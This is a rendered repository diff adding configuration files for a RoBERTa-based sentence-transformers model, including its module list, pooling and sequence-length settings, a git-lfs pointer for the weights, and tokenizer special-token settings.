10 |
+
"document": ""
|
11 |
+
},
|
12 |
+
"default_prompt_name": null,
|
13 |
+
"similarity_fn_name": "cosine"
|
14 |
+
}
|
merges.txt
ADDED
The diff for this file is too large to render.
See raw diff
|
|
model.safetensors
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:25916e4dd9e51f4101337629a68e231c207326859f0dcdaa5c2ac7ba18841969
|
3 |
+
size 498604904
|
modules.json
ADDED
@@ -0,0 +1,14 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
[
|
2 |
+
{
|
3 |
+
"idx": 0,
|
4 |
+
"name": "0",
|
5 |
+
"path": "",
|
6 |
+
"type": "sentence_transformers.models.Transformer"
|
7 |
+
},
|
8 |
+
{
|
9 |
+
"idx": 1,
|
10 |
+
"name": "1",
|
11 |
+
"path": "1_Pooling",
|
12 |
+
"type": "sentence_transformers.models.Pooling"
|
13 |
+
}
|
14 |
+
]
|
sentence_bert_config.json
ADDED
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"max_seq_length": 512,
|
3 |
+
"do_lower_case": false
|
4 |
+
}
|
special_tokens_map.json
ADDED
@@ -0,0 +1,51 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"bos_token": {
|
3 |
+
"content": "<s>",
|
4 |
+
"lstrip": false,
|
5 |
+
"normalized": true,
|
6 |
+
"rstrip": false,
|
7 |
+
"single_word": false
|
8 |
+
},
|
9 |
+
"cls_token": {
|
10 |
+
"content": "<s>",
|
11 |
+
"lstrip": false,
|
12 |
+
"normalized": true,
|
13 |
+
"rstrip": false,
|
14 |
+
"single_word": false
|
15 |
+
},
|
16 |
+
"eos_token": {
|
17 |
+
"content": "</s>",
|
18 |
+
"lstrip": false,
|
19 |
+
"normalized": true,
|
20 |
+
"rstrip": false,
|
21 |
+
"single_word": false
|
22 |
+
},
|
23 |
+
"mask_token": {
|
24 |
+
"content": "<mask>",
|
25 |
+
"lstrip": true,
|
26 |
+
"normalized": false,
|
27 |
+
"rstrip": false,
|
28 |
+
"single_word": false
|
29 |
+
},
|
30 |
+
"pad_token": {
|
31 |
+
"content": "<pad>",
|
32 |
+
"lstrip": false,
|
33 |
+
"normalized": true,
|
34 |
+
"rstrip": false,
|
35 |
+
"single_word": false
|
36 |
+
},
|
37 |
+
"sep_token": {
|
38 |
+
"content": "</s>",
|
39 |
+
"lstrip": false,
|
40 |
+
"normalized": true,
|
41 |
+
"rstrip": false,
|
42 |
+
"single_word": false
|
43 |
+
},
|
44 |
+
"unk_token": {
|
45 |
+
"content": "<unk>",
|
46 |
+
"lstrip": false,
|
47 |
+
"normalized": true,
|
48 |
+
"rstrip": false,
|
49 |
+
"single_word": false
|
50 |
+
}
|
51 |
+
}
|
tokenizer.json
ADDED
The diff for this file is too large to render.
See raw diff
|
|
tokenizer_config.json
ADDED
@@ -0,0 +1,58 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"add_prefix_space": false,
|
3 |
+
"added_tokens_decoder": {
|
4 |
+
"0": {
|
5 |
+
"content": "<s>",
|
6 |
+
"lstrip": false,
|
7 |
+
"normalized": true,
|
8 |
+
"rstrip": false,
|
9 |
+
"single_word": false,
|
10 |
+
"special": true
|
11 |
+
},
|
12 |
+
"1": {
|
13 |
+
"content": "<pad>",
|
14 |
+
"lstrip": false,
|
15 |
+
"normalized": true,
|
16 |
+
"rstrip": false,
|
17 |
+
"single_word": false,
|
18 |
+
"special": true
|
19 |
+
},
|
20 |
+
"2": {
|
21 |
+
"content": "</s>",
|
22 |
+
"lstrip": false,
|
23 |
+
"normalized": true,
|
24 |
+
"rstrip": false,
|
25 |
+
"single_word": false,
|
26 |
+
"special": true
|
27 |
+
},
|
28 |
+
"3": {
|
29 |
+
"content": "<unk>",
|
30 |
+
"lstrip": false,
|
31 |
+
"normalized": true,
|
32 |
+
"rstrip": false,
|
33 |
+
"single_word": false,
|
34 |
+
"special": true
|
35 |
+
},
|
36 |
+
"50264": {
|
37 |
+
"content": "<mask>",
|
38 |
+
"lstrip": true,
|
39 |
+
"normalized": false,
|
40 |
+
"rstrip": false,
|
41 |
+
"single_word": false,
|
42 |
+
"special": true
|
43 |
+
}
|
44 |
+
},
|
45 |
+
"bos_token": "<s>",
|
46 |
+
"clean_up_tokenization_spaces": false,
|
47 |
+
"cls_token": "<s>",
|
48 |
+
"eos_token": "</s>",
|
49 |
+
"errors": "replace",
|
50 |
+
"extra_special_tokens": {},
|
51 |
+
"mask_token": "<mask>",
|
52 |
+
"model_max_length": 512,
|
53 |
+
"pad_token": "<pad>",
|
54 |
+
"sep_token": "</s>",
|
55 |
+
"tokenizer_class": "RobertaTokenizer",
|
56 |
+
"trim_offsets": true,
|
57 |
+
"unk_token": "<unk>"
|
58 |
+
}
|
vocab.json
ADDED
The diff for this file is too large to render.
See raw diff
|
|